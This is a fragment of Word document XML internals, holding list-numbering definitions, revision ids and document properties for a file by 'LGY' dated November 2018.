    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="73AAB274"/>
    <w:lvl w:ilvl="0" w:tplc="47829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44B39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE10000C"/>
    <w:lvl w:ilvl="0" w:tplc="B52E1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D26CB3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2402CED2"/>
    <w:lvl w:ilvl="0" w:tplc="CDB2D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6C5C57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2D61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BF5483"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65F83D7E"/>
    <w:lvl w:ilvl="0" w:tplc="D2A0F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85"/>
    <w:rsid w:val="00192379"/>
    <w:rsid w:val="001D1B1D"/>
    <w:rsid w:val="0030483B"/>
    <w:rsid w:val="003B05E5"/>
    <w:rsid w:val="003E1E9A"/>
    <w:rsid w:val="004102C5"/>
    <w:rsid w:val="004F0EE0"/>
    <w:rsid w:val="004F14E9"/>
    <w:rsid w:val="006E66CF"/>
    <w:rsid w:val="00711585"/>
    <w:rsid w:val="007223B7"/>
    <w:rsid w:val="007D0925"/>
    <w:rsid w:val="008D126B"/>
    <w:rsid w:val="00934996"/>
    <w:rsid w:val="009761DE"/>
    <w:rsid w:val="00A414F7"/>
    <w:rsid w:val="00B36387"/>
    <w:rsid w:val="00B5046B"/>
    <w:rsid w:val="00BF299A"/>
    <w:rsid w:val="00C81A9A"/>
    <w:rsid w:val="00E4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EC71F-28AC-48CA-B08E-B7C6C01C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4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5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414F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1353</Words>
  <Characters>7716</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>64</Lines>
  <Paragraphs>18</Paragraphs>
  <ScaleCrop>false</ScaleCrop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LGY</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>LGY</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-14T16:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-16T15:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>